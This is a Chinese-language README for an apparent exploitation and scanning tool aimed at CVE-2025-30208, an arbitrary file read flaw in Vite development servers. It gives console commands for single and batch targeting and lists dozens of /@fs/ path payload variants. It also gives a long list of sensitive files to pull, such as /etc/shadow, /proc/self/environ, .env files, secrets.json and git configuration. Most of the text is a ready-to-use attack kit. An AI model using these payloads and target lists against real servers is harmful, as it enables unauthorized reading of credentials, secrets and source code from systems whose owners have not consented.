这是一个综合性漏洞扫描器,旨在检测和利用 Vite 开发服务器中的 CVE-2025-30208 漏洞。该漏洞允许攻击者通过 Vite 的文件系统端点实现任意文件读取,从而可能暴露敏感配置文件、源代码和系统信息。
该工具现在采用模块化架构,以提升可维护性和可扩展性:
CVE-2025-30208.py - 主扫描器应用程序payloads.py - 高级利用载荷(60+ 种变体)sensitive_files.py - 综合性敏感文件数据库(200+ 个文件)html_template.py - 增强的黑客风格 HTML 报告模板pip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# 启用详细模式以获取更详细的输出
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[按两次回车结束]
CVE-2025-30208 > scan
# 配置代理
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# 设置自定义请求头
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# 配置速率限制
CVE-2025-30208 > rate
Enter rate limit: 1.0
# 生成美观的 HTML 报告
CVE-2025-30208 > pull
# 启动 Web 服务器查看报告
CVE-2025-30208 > web
# 在指定端口启动 Web 服务器
CVE-2025-30208 > web 8081
# 停止 Web 服务器
CVE-2025-30208 > web off
| 命令 | 描述 | 示例 |
|---|---|---|
set <option> <value> | 设置配置选项 | set RHOST 192.168.1.100 |
show options | 显示当前设置 | show options |
edit | 交互式选项编辑器 | edit |
run / exploit | 运行漏洞测试 | run |
batch | 批量扫描多个目标 | batch |
scan | 发现敏感文件 | scan |
pull | 导出结果到 HTML/JSON | pull |
web [on|off|port] | HTML 报告 Web 服务器 | web 8080 |
save | 保存会话配置 | save |
load | 加载会话配置 | load |
test | 测试与目标的连通性 | test |
validate | 验证当前配置 | validate |
verbose | 切换详细模式 | verbose |
proxy | 配置代理设置 | proxy |
headers | 设置自定义 HTTP 请求头 | headers |
rate | 配置速率限制 | rate |
log | 显示日志信息 | log |
help / ? | 显示帮助 | help |
exit / quit | 退出工具 | exit |
| 选项 | 描述 | 默认值 | 验证规则 |
|---|---|---|---|
RHOST | 目标主机/IP 地址 | - | 主机名/IP 验证 |
RPORT | 目标端口号 | - | 端口范围 (1-65535) |
FILEPATH | 要测试的文件路径 | etc/passwd | 路径验证 |
PROXY | HTTP/HTTPS 代理 URL | - | URL 格式验证 |
VERBOSE | 启用详细输出 | false | 布尔值验证 |
RATE_LIMIT | 请求之间的延迟(秒) | 0.3 | 数字验证 |
THREADS | 批量扫描的线程数 | 5 | 整数验证 |
TIMEOUT | 请求超时(秒) | 5 | 整数验证 |
CUSTOM_HEADERS | 自定义 HTTP 请求头(JSON) | {} | JSON 格式验证 |
扫描器现在使用 60+ 种不同的载荷变体,组织在 payloads.py 中:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
该工具现在测试 200+ 个敏感文件,组织在 sensitive_files.py 中:
/etc/passwd - 用户账户信息/etc/shadow - 加密密码数据/etc/services - 网络服务/etc/hosts - 主机名映射/etc/fstab - 文件系统表/etc/ssh/sshd_config - SSH 服务器配置/etc/crontab - 系统计划任务/etc/sudoers - Sudo 配置/proc/version - 内核版本/proc/cpuinfo - CPU 信息/proc/meminfo - 内存信息/proc/self/environ - 进程环境变量/proc/self/cmdline - 进程命令行/proc/net/tcp - TCP 连接/proc/net/udp - UDP 连接.env - 环境变量.env.local - 本地环境.env.production - 生产环境config.json - 应用程序配置settings.json - 应用程序设置application.properties - Spring 配置application.yml - YAML 配置database.yml - 数据库配置secrets.json - 密钥管理package.json - Node.js 依赖项package-lock.json - 锁定依赖项yarn.lock - Yarn 锁定文件vite.config.js - Vite 配置vite.config.ts - TypeScript Vite 配置tsconfig.json - TypeScript 配置webpack.config.js - Webpack 配置next.config.js - Next.js 配置nuxt.config.js - Nuxt.js 配置angular.json - Angular 配置vue.config.js - Vue.js 配置rollup.config.js - Rollup 配置eslint.config.js - ESLint 配置prettier.config.js - Prettier 配置jest.config.js - Jest 配置babel.config.js - Babel 配置tailwind.config.js - Tailwind CSS 配置.git/config - Git 配置.gitignore - Git 忽略规则.gitattributes - Git 属性.gitmodules - Git 子模块.git/HEAD - 当前分支.git/logs/HEAD - Git 日志.git/refs/heads/master - master 分支.git/refs/heads/main - main 分支README.md - 项目文档CHANGELOG.md - 变更日志LICENSE - 许可证信息CONTRIBUTING.md - 贡献指南AUTHORS - 作者信息TODO.md - 待办事项列表ROADMAP.md - 开发路线图Dockerfile - Docker 配置docker-compose.yml - Docker Composedocker-compose.override.yml - 覆盖配置.dockerignore - Docker 忽略规则docker-compose.prod.yml - 生产配置docker-compose.dev.yml - 开发配置nginx.conf - Nginx 配置apache2.conf - Apache 配置httpd.conf - HTTP 守护程序配置.htaccess - Apache 访问控制web.config - IIS 配置robots.txt - 搜索引擎指令sitemap.xml - 网站结构manifest.json - Web 应用清单sw.js - Service Workerfirebase.json - Firebase 配置firebase.rules - Firebase 安全规则boot.ini - 启动配置autoexec.bat - 自动执行脚本system.ini - 系统配置win.ini - Windows 配置Users - 用户目录Windows - 系统文件Program Files - 应用程序目录System - 系统文件Library - 库文件Applications - 应用程序文件private/etc/hosts - Hosts 文件private/etc/passwd - 用户账户database.db - SQLite 数据库database.sqlite - SQLite 数据库data.db - 数据数据库dump.sql - 数据库转储schema.sql - 数据库模式migrations - 数据库迁移logs - 日志目录error.log - 错误日志access.log - 访问日志app.log - 应用程序日志debug.log - 调试日志combined.log - 合并日志